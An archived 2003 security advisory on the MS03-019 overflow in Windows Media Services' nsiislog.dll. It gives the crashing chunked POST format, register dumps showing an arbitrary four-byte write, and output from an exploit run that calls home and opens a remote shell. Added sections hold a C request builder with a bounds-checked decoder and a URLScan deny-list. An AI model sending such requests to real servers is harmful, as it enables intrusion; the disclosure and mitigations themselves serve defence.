Windows Media Services Remote Command Execution

From: Brett Moore (brettat_private)
Date: Fri May 30 2003 - 17:27:41 PDT


    ========================================================================
    = Windows Media Services Remote Command Execution
    =
    = NSIISLOG.DLL Ver 4.1.0.3920
    =
    = MS Bulletin posted: May 28, 2003 revised May 30, 2003
    = http://www.microsoft.com/technet/security/bulletin/MS03-019.asp
    =
    = Affected Software:
    = 	Microsoft Windows NT 4.0
    = 	Microsoft Windows 2000
    =
    = Public disclosure on May 30, 2003
    ========================================================================
    
    A long time ago, in a place far far away....
    
    Well actually it was four months ago over here in New Zealand. Christmas
    holidays had finished and I was half way through contemplating writing
    a paper entitled 'The Methodical Approach To Finding Overflows'.
    
    I thought I had better try out the concept behind this approach and the
    issues discovered in nsiislog.dll are some of the results of it.
    
    == MS03-019 states ==
    Impact:     Allow an attacker to execute code of their choice
    Max Risk:   Important
    
    There is a flaw in the way in which nsiislog.dll processes incoming
    requests. A vulnerability exists because an attacker could send specially
    formed communications to the server that could cause IIS to stop responding
    to Internet requests.
    
    The vulnerability results because of an unchecked buffer used by the
    nsiislog.dll file for logging. If a specially crafted request is sent to the
    server, the logging file will attempt to write a larger buffer than is
    possible, which in turn causes the IIS service to fail.
    == MS03-019 ==
    
    == Description ==
    
    Sending a chunked-encoded POST to nsiislog.dll causes an access violation
    in the out-of-process IIS application, which produces the following event
    log entry:
    
    ------------------------------------------------------------------------
    Event Type:	Warning
    Event Source:	W3SVC
    Event Category:	None
    Event ID:	37
    Description:
    Out of process application '/LM/W3SVC/1/Root' terminated unexpectedly.
    ------------------------------------------------------------------------
    
    A chunked-encoded POST gives control of both EAX and ECX, with the
    exception occurring at a mov dword ptr [ecx],eax instruction: an
    attacker-chosen dword written to an attacker-chosen address.
    
    This allows remote command execution with the privileges of the
    IWAM_machinename account, the identity under which IIS runs out-of-process
    (isolated) applications.
    
    == Chunked Transfer-Encoding Post ==
    
    POST /scripts/nsiislog.dll HTTP/1.1
    Transfer-Encoding: chunked
    
    PostLength      (chunk size, written in hex as chunked encoding requires)
    PostData        (chunk body of exactly that many bytes)
    0               (zero-length chunk terminates the body)
    
    The "Using Size" values below are the PostLength chosen for each attempt;
    the chunk body was filled with 0x58 ('X'), which is the value that shows up
    in the registers at the crash.
    
    Using Size: 121
    Connecting....Sending Buffer....
    78003F25   dec         dword ptr [ecx+0ACh]
    -
    7800F5ED   dec         dword ptr [esi]		ESI = 58585858
    
    Using Size: 510
    Connecting....Sending Buffer....
    77FC8FE1   mov         dword ptr [ecx],eax	EAX = 58585858
    						ECX = 58585858
    
    Using Size: 5000
    Connecting....Sending Buffer....
    40F01DCC   rep movs    dword ptr [edi],dword ptr [esi]
    -
    77FC8FE1   mov         dword ptr [ecx],eax	EAX = 58585858
    						ECX = 58585858
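    The request skeleton above, as an added example: this is not the advisory's exploit tool, and it sends nothing over the network. It builds the chunked POST for a chosen chunk size (the page's 121, 510 and 5000 are used in main), then runs it through a chunked-body decoder that refuses any chunk that would not fit the destination buffer, i.e. the bound the bulletin says the logging code did not enforce. The 600-byte destination buffer, the 8-hex-digit cap on the size field and the return codes are choices made here, not taken from the page or from nsiislog.dll.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Added example: build the advisory's chunked POST and decode it safely.
 * Nothing here is the advisory's code or nsiislog.dll's code. */

/* Build the request into `out` with one chunk of `size` bytes of `fill`.
 * Returns the request length, or -1 if `cap` is too small to hold it. */
int build_chunked_post(size_t size, char fill, char *out, size_t cap)
{
    const char *hdr = "POST /scripts/nsiislog.dll HTTP/1.1\r\n"
                      "Transfer-Encoding: chunked\r\n\r\n";
    char sizeline[32];
    int n = snprintf(sizeline, sizeof sizeline, "%zx\r\n", size); /* size is hex */
    if (n < 0) return -1;
    size_t need = strlen(hdr) + (size_t)n + size + 7; /* + CRLF + "0\r\n\r\n" */
    if (need > cap) return -1;
    char *p = out;
    memcpy(p, hdr, strlen(hdr));      p += strlen(hdr);
    memcpy(p, sizeline, (size_t)n);   p += n;
    memset(p, fill, size);            p += size;   /* the chunk body */
    memcpy(p, "\r\n0\r\n\r\n", 7);    p += 7;      /* end of chunk, last chunk */
    return (int)(p - out);
}

/* Offset of the body (just past the first CRLFCRLF), or -1 if none. */
long body_offset(const char *req, size_t n)
{
    for (size_t i = 0; i + 4 <= n; i++)
        if (memcmp(req + i, "\r\n\r\n", 4) == 0) return (long)(i + 4);
    return -1;
}

static int hexval(unsigned char c)
{
    if (c >= '0' && c <= '9') return c - '0';
    if (c >= 'a' && c <= 'f') return c - 'a' + 10;
    if (c >= 'A' && c <= 'F') return c - 'A' + 10;
    return -1;
}

/* Decode a chunked body into `out` (capacity `cap`). Returns the decoded
 * length, -1 on malformed or truncated input, or -2 when a chunk would
 * overrun `out`. The -2 path is the check an unchecked-buffer bug lacks. */
long decode_chunked(const char *body, size_t len, char *out, size_t cap)
{
    size_t pos = 0, total = 0;
    for (;;) {
        size_t csize = 0;
        int digits = 0;
        while (pos < len && hexval((unsigned char)body[pos]) >= 0) {
            csize = csize * 16 + (size_t)hexval((unsigned char)body[pos]);
            pos++;
            if (++digits > 8) return -1;          /* refuse absurd sizes */
        }
        if (digits == 0) return -1;               /* no size field */
        while (pos < len && body[pos] != '\n') pos++; /* skip extensions, CR */
        if (pos >= len) return -1;
        pos++;                                    /* past LF */
        if (csize == 0) return (long)total;       /* last chunk */
        if (csize > len - pos) return -1;         /* chunk longer than input */
        if (csize > cap - total) return -2;       /* would overflow `out` */
        memcpy(out + total, body + pos, csize);
        total += csize;
        pos += csize;
        if (pos + 2 > len || body[pos] != '\r' || body[pos + 1] != '\n') return -1;
        pos += 2;                                 /* CRLF after chunk data */
    }
}

/* Round trip: build a request with a `size`-byte chunk, decode it into a
 * `cap`-byte buffer, and return decode_chunked's result (-3 if build fails). */
long demo(size_t size, size_t cap)
{
    static char req[16384];
    int n = build_chunked_post(size, 'X', req, sizeof req);
    if (n < 0) return -3;
    long off = body_offset(req, (size_t)n);
    if (off < 0) return -1;
    char *dec = malloc(cap ? cap : 1);
    long r = decode_chunked(req + off, (size_t)n - (size_t)off, dec, cap);
    free(dec);
    return r;
}

/* Decode a NUL-terminated literal body into a fresh `cap`-byte buffer. */
long decode_literal(const char *body, size_t cap)
{
    char *dec = malloc(cap ? cap : 1);
    long r = decode_chunked(body, strlen(body), dec, cap);
    free(dec);
    return r;
}

int main(void)
{
    size_t sizes[] = { 121, 510, 5000 };          /* the advisory's three attempts */
    for (size_t i = 0; i < 3; i++)
        printf("chunk of %5zu bytes into a 600-byte buffer -> %ld\n",
               sizes[i], demo(sizes[i], 600));
    return 0;
}
```

    Run stand-alone it reports 121 and 510 decoded, and -2 for the 5000-byte chunk: the request is well-formed, the only thing wrong with it is that it is bigger than where it is being copied, which is exactly the class of request the bulletin describes.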
    
    == Exploitation ==
    
    The infamous 'mov dword ptr [ecx],eax': with both registers under attacker
    control this is an arbitrary four-byte write, and control is taken by
    placing a value at a location that is later loaded into the EIP register.
    
    In this case the exception was handled internally, so execution flow could
    not be obtained through SEH, but we were successful in obtaining control by
    overwriting a portion of another three-letter acronym (left unnamed here;
    the exploit output below refers to it only as the 'ABC overwrite').
    
    == Exploit Example ==
    
    %:\>exploit 192.168.1.63
    ** IISNSLOG.DLL - 4.1.0.3920 - Remote Shell **
    
    . Calling Home: blackhole:2000
    . Using: 0x########h as ABC overwrite
    . Using: 0x########h as direct jump location
    . Shellcode Size: 322 bytes
    . Preparing Exploit Buffer......Ready
    . Starting Listener On Port: 2000
    . Connecting To Target
    . Sending Exploit......Exploit Sent
    . Connection Received
    Microsoft Windows 2000 [Version 5.00.2195]
    (C) Copyright 1985-2000 Microsoft Corp.
    C:\WINNT\system32>whoami
    IWAM_BLACKHOLE
    C:\WINNT\system32>
    
    == Solutions ==
    
    - Every day can be a 0-day on the Internet. Limiting the avenues of
      attack is a key factor in reducing the risk to a web server. Programs
      such as SecureIIS and URLScan should be set up to reduce the number of
      methods that can be used to send data to the server. Removing unnecessary
      services, files and ISAPI extensions reduces the number of listeners
      that data can be fed to, and with it the number of vulnerabilities a
      server is exposed to. nsiislog.dll is only reachable on servers where
      Windows Media Services' multicast and advertisement logging has been
      installed; if it is not needed, remove the file and its mapping.
    - Install the vendor-supplied patch.
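    As an added illustration of the first point (not from the advisory, and not an official Microsoft configuration), here is a URLScan.ini fragment in the shape a hardened IIS 4/5 front end of that era would use. The section and key names are URLScan 2.5's; the particular verbs, extensions and limits are choices made here for this example, and the comments are mine.

```ini
; Illustrative URLScan.ini fragment, not a shipped default.

[Options]
; Accept only the verbs listed under [AllowVerbs].
UseAllowVerbs=1
; Use the [DenyExtensions] list rather than an allow list of extensions.
UseAllowExtensions=0
NormalizeUrlBeforeScan=1
VerifyNormalization=1
EnableLogging=1

[AllowVerbs]
GET
HEAD
; POST is deliberately omitted; add it back only if a hosted
; application actually needs it.

[DenyExtensions]
; No direct requests for ISAPI extension DLLs such as nsiislog.dll.
; This also blocks every other .dll endpoint, so check what the box serves.
.dll
.exe
.ida
.idq
.printer

[DenyHeaders]
; Refuse chunked requests outright; legitimate clients that rely on
; chunked uploads will break, so decide per server.
Transfer-Encoding:

[RequestLimits]
MaxAllowedContentLength=30000000
MaxUrl=260
MaxQueryString=2048
```

    Filtering is a mitigation, not a fix: it narrows what reaches the DLL but does nothing about the unchecked buffer, so the patch (or removing the DLL where it is not needed) is still required.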
    
    == Credit ==
    
    Discovered and advised to Microsoft January 27, 2003 by Brett Moore.
    
    %-) shutz to: eEye, spyrit and all kiwis with hackfu
    %-) ha. we'll just say: "All of your livers are belong to us".
    



    This archive was generated by hypermail 2b30 : Sun Jun 01 2003 - 10:51:56 PDT